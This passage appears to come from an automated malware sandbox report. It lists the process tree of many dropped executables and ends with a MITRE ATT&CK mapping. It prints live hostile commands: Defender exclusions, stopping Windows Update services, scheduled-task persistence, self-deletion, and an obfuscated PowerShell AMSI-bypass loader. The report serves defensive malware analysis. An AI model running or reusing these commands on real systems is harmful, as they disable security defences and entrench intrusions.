        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        
        PID:10620
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
        8⤵
        
        PID:8616
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        7⤵
        
        PID:11168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        8⤵
        
        PID:7196
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        9⤵
        Launches sc.exe
        
        PID:6756
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        
        PID:9840
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        9⤵
        Launches sc.exe
        
        PID:2716
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        9⤵
        Launches sc.exe
        
        PID:228
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        9⤵
        Launches sc.exe
        
        PID:10652
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\AnneSalt.exe"
      4⤵
      PID:10084
    - - C:\Users\Admin\Desktop\Files\AnneSalt.exe
        
        C:\Users\Admin\Desktop\Files\AnneSalt.exe
        5⤵
        
        PID:3576
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k move Technique Technique.cmd & Technique.cmd & exit
        6⤵
        
        PID:10004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /k move Technique Technique.cmd & Technique.cmd & exit
        7⤵
        
        PID:10764
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
      4⤵
      PID:3948
    - - C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
        
        C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
        5⤵
        
        PID:6640
      - C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
        
        "C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
        6⤵
        
        PID:7324
      - C:\Users\Admin\Desktop\Files\kp8dnpa9.exe
        
        "C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"
        6⤵
        
        PID:6424
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 292
        6⤵
        Program crash
        
        PID:8792
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\xxl.exe"
      4⤵
      PID:10128
    - - C:\Users\Admin\Desktop\Files\xxl.exe
        
        C:\Users\Admin\Desktop\Files\xxl.exe
        5⤵
        
        PID:6636
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\XLOADE~1.EXE"
      4⤵
      PID:6988
    - - C:\Users\Admin\Desktop\Files\XLOADE~1.EXE
        
        C:\Users\Admin\Desktop\Files\XLOADE~1.EXE
        5⤵
        
        PID:10284
      - C:\Users\Admin\Desktop\Files\XLOADE~1.EXE
        
        "C:\Users\Admin\Desktop\Files\XLOADE~1.EXE"
        6⤵
        
        PID:9580
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\TIGERH~1.EXE"
      4⤵
      PID:11088
    - - C:\Users\Admin\Desktop\Files\TIGERH~1.EXE
        
        C:\Users\Admin\Desktop\Files\TIGERH~1.EXE
        5⤵
        
        PID:2040
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\ZinTask.exe"
      4⤵
      PID:10824
    - - C:\Users\Admin\Desktop\Files\ZinTask.exe
        
        C:\Users\Admin\Desktop\Files\ZinTask.exe
        5⤵
        
        PID:11160
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11160 -s 232
        6⤵
        Program crash
        
        PID:8296
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\5KNCHA~1.EXE"
      4⤵
      PID:9696
    - - C:\Users\Admin\Desktop\Files\5KNCHA~1.EXE
        
        C:\Users\Admin\Desktop\Files\5KNCHA~1.EXE
        5⤵
        
        PID:9620
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\LEDGER~1.EXE"
      4⤵
      PID:9700
    - - C:\Users\Admin\Desktop\Files\LEDGER~1.EXE
        
        C:\Users\Admin\Desktop\Files\LEDGER~1.EXE
        5⤵
        
        PID:804
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Desktop\Files\LEDGER~1.EXE
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:10668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Desktop\Files\LEDGER~1.EXE
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1412
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:9152
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\caspol.exe"
      4⤵
      PID:10304
    - - C:\Users\Admin\Desktop\Files\caspol.exe
        
        C:\Users\Admin\Desktop\Files\caspol.exe
        5⤵
        
        PID:1716
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\caspol.exe"
        6⤵
        
        PID:7752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\Desktop\Files\caspol.exe
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7172
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\bdWEysRwjYwmy.exe"
        6⤵
        
        PID:9908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\bdWEysRwjYwmy.exe
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10664
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bdWEysRwjYwmy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB9CD.tmp"
        6⤵
        
        PID:9428
        
        C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /Create /TN Updates\bdWEysRwjYwmy /XML C:\Users\Admin\AppData\Local\Temp\tmpB9CD.tmp
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11072
      - C:\Users\Admin\Desktop\Files\caspol.exe
        
        "C:\Users\Admin\Desktop\Files\caspol.exe"
        6⤵
        
        PID:7932
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\pp.exe"
      4⤵
      PID:9040
    - - C:\Users\Admin\Desktop\Files\pp.exe
        
        C:\Users\Admin\Desktop\Files\pp.exe
        5⤵
        
        PID:6588
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\morphic.exe"
      4⤵
      PID:5224
    - - C:\Users\Admin\Desktop\Files\morphic.exe
        
        C:\Users\Admin\Desktop\Files\morphic.exe
        5⤵
        
        PID:9740
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\5.exe"
      4⤵
      PID:9932
    - - C:\Users\Admin\Desktop\Files\5.exe
        
        C:\Users\Admin\Desktop\Files\5.exe
        5⤵
        
        PID:10716
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\18ijuw13.exe"
      4⤵
      PID:7324
    - - C:\Users\Admin\Desktop\Files\18ijuw13.exe
        
        C:\Users\Admin\Desktop\Files\18ijuw13.exe
        5⤵
        
        PID:8848
      - C:\Users\Admin\Desktop\Files\18ijuw13.exe
        
        "C:\Users\Admin\Desktop\Files\18ijuw13.exe"
        6⤵
        
        PID:8844
      - C:\Users\Admin\Desktop\Files\18ijuw13.exe
        
        "C:\Users\Admin\Desktop\Files\18ijuw13.exe"
        6⤵
        
        PID:8172
      - C:\Users\Admin\Desktop\Files\18ijuw13.exe
        
        "C:\Users\Admin\Desktop\Files\18ijuw13.exe"
        6⤵
        
        PID:9288
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8848 -s 336
        6⤵
        Program crash
        
        PID:7104
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE"
      4⤵
      PID:10048
    - - C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE
        
        C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE
        5⤵
        
        PID:8604
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\r.exe"
      4⤵
      PID:2352
    - - C:\Users\Admin\Desktop\Files\r.exe
        
        C:\Users\Admin\Desktop\Files\r.exe
        5⤵
        
        PID:6832
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\tstory.exe"
      4⤵
      PID:7456
    - - C:\Users\Admin\Desktop\Files\tstory.exe
        
        C:\Users\Admin\Desktop\Files\tstory.exe
        5⤵
        
        PID:7788
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\j.exe"
      4⤵
      PID:9628
    - - C:\Users\Admin\Desktop\Files\j.exe
        
        C:\Users\Admin\Desktop\Files\j.exe
        5⤵
        
        PID:9884
- - C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
    "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\2388f315-e088-4770-8629-d2f81d3e1e62.dmp"
    3⤵
    PID:8016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4980 -ip 4980
1⤵
PID:5520

C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AwzzkniBXRNp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ovhdBvrwYnYZvh,[Parameter(Position=1)][Type]$ickJQVgpXp)$YPLbuLGkYjO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'le'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+'d'+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'','Cla'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+'e'+[Char](100)+','+[Char](65)+'ns'+[Char](105)+''+'C'+''+[Char](108)+'as'+[Char](115)+','+[Char](65)+'u'+'t'+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$YPLbuLGkYjO.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+',H'+'i'+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ovhdBvrwYnYZvh).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$YPLbuLGkYjO.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+'wS'+[Char](108)+''+'o'+'t'+[Char](44)+''+'V'+''+'i'+''+[Char](114)+'tua'+'l'+'',$ickJQVgpXp,$ovhdBvrwYnYZvh).SetImplementationFlags(''+'R'+'un'+[Char](116)+'i'+'m'+''+'e'+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'ged');Write-Output $YPLbuLGkYjO.CreateType();}$ZNXbIkwOfnFlj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+'t'+'.'+''+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+'eM'+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+'s');$SJBNRoqFoUUcTd=$ZNXbIkwOfnFlj.GetMethod('G'+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+'c,'+[Char](83)+''+'t'+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fUyaOLRxjTNIBSfIFsz=AwzzkniBXRNp @([String])([IntPtr]);$HzIAlbiXXdFXMUIuQFmGlI=AwzzkniBXRNp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UmFHBdJGLsS=$ZNXbIkwOfnFlj.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+'o'+'d'+'u'+'leHa'+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$LFkUTjWnrOHQrj=$SJBNRoqFoUUcTd.Invoke($Null,@([Object]$UmFHBdJGLsS,[Object]('L'+[Char](111)+'ad'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$cROFJWiiGUlacvwdn=$SJBNRoqFoUUcTd.Invoke($Null,@([Object]$UmFHBdJGLsS,[Object]('V'+[Char](105)+'r'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+'P'+''+'r'+'o'+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$Nwofeka=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LFkUTjWnrOHQrj,$fUyaOLRxjTNIBSfIFsz).Invoke('a'+[Char](109)+''+[Char](115)+'i.'+'d'+''+'l'+''+[Char](108)+'');$DQMAzsTUUlwKWpgil=$SJBNRoqFoUUcTd.Invoke($Null,@([Object]$Nwofeka,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$CauaQWtKxb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cROFJWiiGUlacvwdn,$HzIAlbiXXdFXMUIuQFmGlI).Invoke($DQMAzsTUUlwKWpgil,[uint32]8,4,[ref]$CauaQWtKxb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DQMAzsTUUlwKWpgil,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cROFJWiiGUlacvwdn,$HzIAlbiXXdFXMUIuQFmGlI).Invoke($DQMAzsTUUlwKWpgil,[uint32]8,0x20,[ref]$CauaQWtKxb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Command and Scripting Interpreter: PowerShell
PID:112

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:8072
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F3AE4D002C6E58FE784520934C66B761
  2⤵
  PID:3732

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\720a4f2f82a5428bbf08a250e59b2c05 /t 5452 /p 2892
1⤵
PID:7816

C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
1⤵
PID:7992

C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
1⤵
PID:8180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7792 -ip 7792
1⤵
PID:6792

C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
1⤵
PID:8604

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\8069e17e3ed945d29d2585a3f8dca506 /t 7964 /p 7288
1⤵
PID:6716

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" /Y
1⤵
- Process spawned unexpected child process
PID:180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7480 -ip 7480
1⤵
PID:8792

C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
1⤵
PID:10684
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Windows.exe"
  2⤵
  PID:8696
- - C:\Users\Admin\AppData\Local\Temp\3582-490\Windows.exe
    C:\Users\Admin\AppData\Local\Temp\3582-490\Windows.exe
    3⤵
    PID:11140

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:10796
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE" -Embedding
  2⤵
  PID:9252
- - C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE
    C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE -Embedding
    3⤵
    PID:180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 11160 -ip 11160
1⤵
PID:10476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6640 -ip 6640
1⤵
PID:11148

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{060cb464-aab1-4b57-8640-37ae949de498}
1⤵
PID:9796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5360 -ip 5360
1⤵
PID:9904

C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
1⤵
PID:1192

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:9280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 10080 -ip 10080
1⤵
PID:5448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5852 -ip 5852
1⤵
PID:10048

C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
1⤵
PID:676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 8848 -ip 8848
1⤵
PID:8968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:10716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Modify Authentication Process

Steal Web Session Cookie

T1539

Discovery

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery